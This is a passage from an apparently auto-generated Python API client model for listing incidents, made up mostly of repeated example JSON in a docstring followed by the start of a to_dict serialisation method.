'sort_key': 10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric':
'123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}, {'custom_field': {'description': 'Which team is impacted by this issue', 'field_type':
'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options': [{'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456',
'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}], 'id': '01FDAG4SAP5TYPT98WGR2N7W91', 'incident_role_assignments': [{'assignee': {'email':
'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role':
{'created_at': '2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident',
'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}, {'assignee': {'email': 'lisa@incident.io', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role': {'created_at':
'2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}], 'mode': 'real', 'name': 'Our database is sad', 'permalink':
'Impedit delectus accusamus ea eos.', 'postmortem_document_url': 'https://docs.google.com/my_doc_id',
'reference': 'INC-123', 'severity': {'created_at': '2021-08-17T13:28:57.801578Z', 'description': "It's not
really that bad, everyone chill", 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Minor', 'rank': 1, 'updated_at':
'2021-08-17T13:28:57.801578Z'}, 'slack_channel_id': 'C02AW36C1M5', 'slack_channel_name': 'inc-165-green-parrot',
'status': 'triage', 'summary': "Our database is really really sad, and we don't know why yet.", 'timestamps':
[{'last_occurred_at': '2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at':
'2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at': '2021-08-17T13:28:57.801578Z',
'name': 'last_activity'}], 'type': 'Doloremque sit dolor et libero non eos.', 'updated_at':
'2021-08-17T13:28:57.801578Z', 'visibility': 'public'}], 'pagination_meta': {'after':
'01FCNDV6P870EA6S7TK1DSYDG0', 'page_size': 25, 'total_record_count': 238}}
Attributes:
incidents (List[IncidentResponseBody]): Example: [{'call_url': 'https://zoom.us/foo', 'created_at':
'2021-08-17T13:28:57.801578Z', 'creator': {'api_key': {'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'My test API
key'}, 'user': {'email': 'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis',
'role': 'viewer'}}, 'custom_field_entries': [{'custom_field': {'description': 'Which team is impacted by this
issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options':
[{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric':
'123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}, {'custom_field': {'description': 'Which team is impacted by this issue', 'field_type':
'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options': [{'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456',
'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}], 'id': '01FDAG4SAP5TYPT98WGR2N7W91', 'incident_role_assignments': [{'assignee': {'email':
'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role':
{'created_at': '2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident',
'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}, {'assignee': {'email': 'lisa@incident.io', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role': {'created_at':
'2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}], 'mode': 'real', 'name': 'Our database is sad', 'permalink':
'Impedit delectus accusamus ea eos.', 'postmortem_document_url': 'https://docs.google.com/my_doc_id',
'reference': 'INC-123', 'severity': {'created_at': '2021-08-17T13:28:57.801578Z', 'description': "It's not
really that bad, everyone chill", 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Minor', 'rank': 1, 'updated_at':
'2021-08-17T13:28:57.801578Z'}, 'slack_channel_id': 'C02AW36C1M5', 'slack_channel_name': 'inc-165-green-parrot',
'status': 'triage', 'summary': "Our database is really really sad, and we don't know why yet.", 'timestamps':
[{'last_occurred_at': '2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at':
'2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at': '2021-08-17T13:28:57.801578Z',
'name': 'last_activity'}], 'type': 'Doloremque sit dolor et libero non eos.', 'updated_at':
'2021-08-17T13:28:57.801578Z', 'visibility': 'public'}, {'call_url': 'https://zoom.us/foo', 'created_at':
'2021-08-17T13:28:57.801578Z', 'creator': {'api_key': {'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'My test API
key'}, 'user': {'email': 'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis',
'role': 'viewer'}}, 'custom_field_entries': [{'custom_field': {'description': 'Which team is impacted by this
issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options':
[{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric':
'123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}, {'custom_field': {'description': 'Which team is impacted by this issue', 'field_type':
'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options': [{'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456',
'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}], 'id': '01FDAG4SAP5TYPT98WGR2N7W91', 'incident_role_assignments': [{'assignee': {'email':
'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role':
{'created_at': '2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident',
'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}, {'assignee': {'email': 'lisa@incident.io', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role': {'created_at':
'2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}], 'mode': 'real', 'name': 'Our database is sad', 'permalink':
'Impedit delectus accusamus ea eos.', 'postmortem_document_url': 'https://docs.google.com/my_doc_id',
'reference': 'INC-123', 'severity': {'created_at': '2021-08-17T13:28:57.801578Z', 'description': "It's not
really that bad, everyone chill", 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Minor', 'rank': 1, 'updated_at':
'2021-08-17T13:28:57.801578Z'}, 'slack_channel_id': 'C02AW36C1M5', 'slack_channel_name': 'inc-165-green-parrot',
'status': 'triage', 'summary': "Our database is really really sad, and we don't know why yet.", 'timestamps':
[{'last_occurred_at': '2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at':
'2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at': '2021-08-17T13:28:57.801578Z',
'name': 'last_activity'}], 'type': 'Doloremque sit dolor et libero non eos.', 'updated_at':
'2021-08-17T13:28:57.801578Z', 'visibility': 'public'}, {'call_url': 'https://zoom.us/foo', 'created_at':
'2021-08-17T13:28:57.801578Z', 'creator': {'api_key': {'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'My test API
key'}, 'user': {'email': 'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis',
'role': 'viewer'}}, 'custom_field_entries': [{'custom_field': {'description': 'Which team is impacted by this
issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options':
[{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric':
'123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}, {'custom_field': {'description': 'Which team is impacted by this issue', 'field_type':
'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected Team', 'options': [{'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value':
'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key':
10, 'value': 'Product'}]}, 'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456',
'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope you like it'}, {'value_link':
'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}]}, {'custom_field': {'description': 'Which team is
impacted by this issue', 'field_type': 'single_select', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Affected
Team', 'options': [{'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0',
'sort_key': 10, 'value': 'Product'}, {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}]},
'values': [{'value_link': 'https://google.com/', 'value_numeric': '123.456', 'value_option': {'custom_field_id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'},
'value_text': 'This is my text field, I hope you like it'}, {'value_link': 'https://google.com/',
'value_numeric': '123.456', 'value_option': {'custom_field_id': '01FCNDV6P870EA6S7TK1DSYDG0', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'sort_key': 10, 'value': 'Product'}, 'value_text': 'This is my text field, I hope
you like it'}]}], 'id': '01FDAG4SAP5TYPT98WGR2N7W91', 'incident_role_assignments': [{'assignee': {'email':
'lisa@incident.io', 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role':
{'created_at': '2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident',
'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}, {'assignee': {'email': 'lisa@incident.io', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Lisa Karlin Curtis', 'role': 'viewer'}, 'role': {'created_at':
'2021-08-17T13:28:57.801578Z', 'description': 'The person currently coordinating the incident', 'id':
'01FCNDV6P870EA6S7TK1DSYDG0', 'instructions': 'Take point on the incident; Make sure people are clear on
responsibilities', 'name': 'Incident Lead', 'required': True, 'role_type': 'lead', 'shortform': 'lead',
'updated_at': '2021-08-17T13:28:57.801578Z'}}], 'mode': 'real', 'name': 'Our database is sad', 'permalink':
'Impedit delectus accusamus ea eos.', 'postmortem_document_url': 'https://docs.google.com/my_doc_id',
'reference': 'INC-123', 'severity': {'created_at': '2021-08-17T13:28:57.801578Z', 'description': "It's not
really that bad, everyone chill", 'id': '01FCNDV6P870EA6S7TK1DSYDG0', 'name': 'Minor', 'rank': 1, 'updated_at':
'2021-08-17T13:28:57.801578Z'}, 'slack_channel_id': 'C02AW36C1M5', 'slack_channel_name': 'inc-165-green-parrot',
'status': 'triage', 'summary': "Our database is really really sad, and we don't know why yet.", 'timestamps':
[{'last_occurred_at': '2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at':
'2021-08-17T13:28:57.801578Z', 'name': 'last_activity'}, {'last_occurred_at': '2021-08-17T13:28:57.801578Z',
'name': 'last_activity'}], 'type': 'Doloremque sit dolor et libero non eos.', 'updated_at':
'2021-08-17T13:28:57.801578Z', 'visibility': 'public'}].
pagination_meta (Union[Unset, PaginationMetaResponseBody]): Example: {'after': '01FCNDV6P870EA6S7TK1DSYDG0',
'page_size': 25, 'total_record_count': 238}.
"""
incidents: List[IncidentResponseBody]
pagination_meta: Union[Unset, PaginationMetaResponseBody] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
incidents = []
for incidents_item_data in self.incidents:
incidents_item = incidents_item_data.to_dict()
incidents.append(incidents_item)
pagination_meta: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.pagination_meta, Unset):
pagination_meta = self.pagination_meta.to_dict()
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update(
{
